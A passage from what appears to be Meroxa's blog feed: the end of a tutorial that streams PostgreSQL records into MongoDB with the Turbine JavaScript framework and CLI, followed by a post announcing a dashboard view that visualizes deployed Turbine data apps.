&lt;li&gt;The Meroxa Platform then streams that data to MongoDB in real-time, without you, the developer having to worry about scalability, flexibility or schemas.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;MongoDB Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt; (In this tutorial we will be using the Turbine Javascript Framework)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you can follow the following 4 steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI, you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and MongoDB Atlas Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Guide on configuring your PostgreSQL&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type postgres \\\\
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
--metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;MongoDB Atlas&lt;/strong&gt; (&lt;a href=&quot;https://www.mongodb.com/docs/atlas/getting-started/&quot;&gt;Guide on setting up Mongo Db Atlas&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a MongoDB Atlas connection named &lt;code class=&quot;language-text&quot;&gt;mdb&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mdb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type mongodb \\
--url &quot;mongodb+srv://$MONGO_USER:$MONGO_PASS@$MONGO_URL/$MONGO_DATABASE_NAME&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing our Turbine app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init postgres-to-mongo &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will create a directory called &lt;code class=&quot;language-text&quot;&gt;postgres-to-mongo&lt;/code&gt; with some boilerplate code to get you started.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our Turbine app&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;postgres-to-mongo&lt;/code&gt; folder in your preferred IDE. Let’s code our upstream and downstream resources that we defined in step 1 above.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Third, Process each record that comes in!&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;processData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Fourth, identify your MongoDB destination resource configured in Step 1&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mdb&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which &quot;collection&quot; in mongo to write to. If none exists, it will be created&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_copy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In our &lt;code class=&quot;language-text&quot;&gt;processData&lt;/code&gt; function we will just be logging the time when the record was processed. However, in this function you can do anything to transform your records, such as calling an API, manipulating data, enriching data etc. In the code below we have some examples in the comments.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token function&quot;&gt;processData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; dateTimeGmt &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toGMTString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[DEBUG] Streaming Record To Destination: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;dateTimeGmt&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Encrypt data using a 3rd party library or package&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&apos;secretcode&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;sha256&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;secretcode&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Format Data via a custom function&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;phone_number&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;formatPhone&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;phone_number&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Enrich Data via an API&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressLookupResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressMetaData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;addressLookupResults&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address_metadata&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; addressMetaData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;unwrap&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For a more detailed example on using API’s &amp;#x26; doing transformations in Turbine you can read our blog post &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your Application&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 To visualize your deployed application, you can check out an overview of our Turbine visualizations &lt;a href=&quot;https://meroxa.com/blog/introducing-visualized-turbine-applications&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once your app is deployed you will see the PostgreSQL data populate in the &lt;code class=&quot;language-text&quot;&gt;user_copy&lt;/code&gt; collection in MongoDB Atlas. As records or changes come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record in real-time!&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Visualized Turbine Applications]]></title><description><![CDATA[Visualizing the Turbine data app provides insight into the runtime details of the application’s components on the platform.]]></description><link>https://meroxa.com/blog/introducing-visualized-turbine-applications</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-visualized-turbine-applications</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Thu, 08 Dec 2022 15:36:37 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce—software developers can now visualize what is happening behind the scenes with their Turbine data apps deployed to the Meroxa Platform. The application visualization provides insight into runtime details of subcomponents the Meroxa Platform builds and configures based on the code written with Turbine. Including the directional flow of data.&lt;/p&gt;
&lt;p&gt;We designed the Turbine Application Framework with&lt;em&gt;developer experience&lt;/em&gt; in mind. There&apos;s no need to learn a proprietary DSL (domain-specific language). Software developers can use their choice of supported programming language to build, test, and deploy robust data apps to process data streams. All while coexisting alongside an existing ecosystem of apps and services.&lt;/p&gt;
&lt;p&gt;The Meroxa platform simplifies deployment by abstracting away the complexity required to build out and configure the various subcomponents necessary to run the data app and scale it dynamically, on demand, on our serverless architecture. The visualization aims to make this transparent.&lt;/p&gt;
&lt;h2&gt;Turbine Application Details&lt;/h2&gt;
&lt;p&gt;The app visualization lives in the application details page for your Turbine data apps. Here’s what you can expect.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%201.png&quot; alt=&quot;Overview&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Source&lt;/h3&gt;
&lt;p&gt;A Source is a required Resource that contains the upstream data for the Turbine data app. There is a limitation of one Source per Turbine data app as we do not yet support multiple Sources. You may however include any number of APIs in your function to help enrich the data stream.&lt;/p&gt;
&lt;p&gt;The Source node in the app visualization communicate the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;type&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;collection&lt;/code&gt; (e.g. table, collection, index, etc), and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Source details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Function&lt;/h3&gt;
&lt;p&gt;A Function contains the custom code you have written using the &lt;code class=&quot;language-text&quot;&gt;process&lt;/code&gt; method. This is where you can transform or enrich data with any number of APIs from third-party platforms and services. The app visualization communicates the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp for the Function.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Function details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Destination(s)&lt;/h3&gt;
&lt;p&gt;A Destination is a Resource where data will be sent from the Turbine data app downstream. You may leverage any number of Destinations, or none at all. It’s up to you.&lt;/p&gt;
&lt;p&gt;Destination nodes in the app visualization communicate the &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;type&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;collection&lt;/code&gt; (e.g. table, collection, index, etc), and &lt;code class=&quot;language-text&quot;&gt;last updated&lt;/code&gt; timestamp.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Intro%20Visualied%20Turbine%20App%20Blog%20Post_Image%204.png&quot; alt=&quot;Destination details&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Data Flow&lt;/h3&gt;
&lt;p&gt;Between each node, you should see an arrow pointing in the direction of where the data is going. An arrow may originate from a Source Resource to a Function or Destination Resource. Or from a Function to a Destination Resource. This will show you where your data is going directionally. Please note, we do not yet validate whether data is moving.&lt;/p&gt;
&lt;h2&gt;Viewing and Access&lt;/h2&gt;
&lt;p&gt;You can access the app visualization on the details page in the Meroxa Dashboard for the Turbine data app. This details page can be accessed directly through the dashboard or via a URL when using select commands in the Meroxa CLI.&lt;/p&gt;
&lt;h3&gt;Dashboard&lt;/h3&gt;
&lt;p&gt;Log in to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SAyN2RwTF9VdjFRc0pDNlY3SkpmT1FNbGo5TTlSemdBMKFupWxvZ2luo3RpZNkgWHRjb2xSQ1FyZjNtb3ZXZXl6akNoRzlSMzdFWnZ0QkajY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=UGR2Sk9iVzhxaUhDanJtcEQyRVYyaEwzeWlnb2xGUS1FOX5kVDhrNHdnUw%3D%3D&amp;#x26;code_challenge=x-Q8UtChGATkgoEIE0sPUUWWah552qPbhJ_tzVOPRHQ&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt;. Once authenticated, you should land on the &lt;strong&gt;Applications&lt;/strong&gt; tab. This will list all Turbine data apps deployed to your account along with their &lt;code class=&quot;language-text&quot;&gt;state&lt;/code&gt;. Click on the application name of choice to view the details page. This is where your app visualization may be accessed.&lt;/p&gt;
&lt;h3&gt;CLI&lt;/h3&gt;
&lt;p&gt;Within the Turbine data app local project file, you may use &lt;code class=&quot;language-text&quot;&gt;meroxa app describe&lt;/code&gt; in the Meroxa CLI will output details about your Turbine data app. Provided with details about the Turbine data app subcomponents that exist, there will be a URL that can be used to access the visualization in the Meroxa Dashboard.&lt;/p&gt;
&lt;p&gt;If you are working outside of the Turbine data app local project file, you can use &lt;code class=&quot;language-text&quot;&gt;meroxa app describe appname&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app describe&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;    UUID:   123ab456-c7d8-91e0-fghi-j12k34lm56n
   Name:   yourappname
Language:   javascript
Git SHA:   ab1234c567de8910f1234g567891011h12i13j0k
Created At:   2022-11-16 19:22:26 +0000 UTC
Updated At:   2022-11-16 19:22:26 +0000 UTC
    State:   running
Resources
	pgdb (jdbc-destination)
		UUID:   12c228be-523c-477b-b4b5-2d25f6d05e8a
		Type:   postgres
		State:   running
	pgdb (debezium-pg-source)
		UUID:   98z765yx-432w-109v-u8t7-6s54r3q21p0o
		Type:   postgres
		State:   running

Functions
	anonymize-ab1234c
		UUID:   1a234bc-d567-8910-ef12-3456gh78ij90
		State:   running

    ✨ To visualize your application, visit https://dashboard.meroxa.io/apps/&amp;lt;yourappname&gt;/detail&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using &lt;code class=&quot;language-text&quot;&gt;meroxa app list&lt;/code&gt; will display a table of all Turbine data apps deployed to your Meroxa account. This will include a direct URL to the Applications list page in the Meroxa Dashboard.&lt;/p&gt;
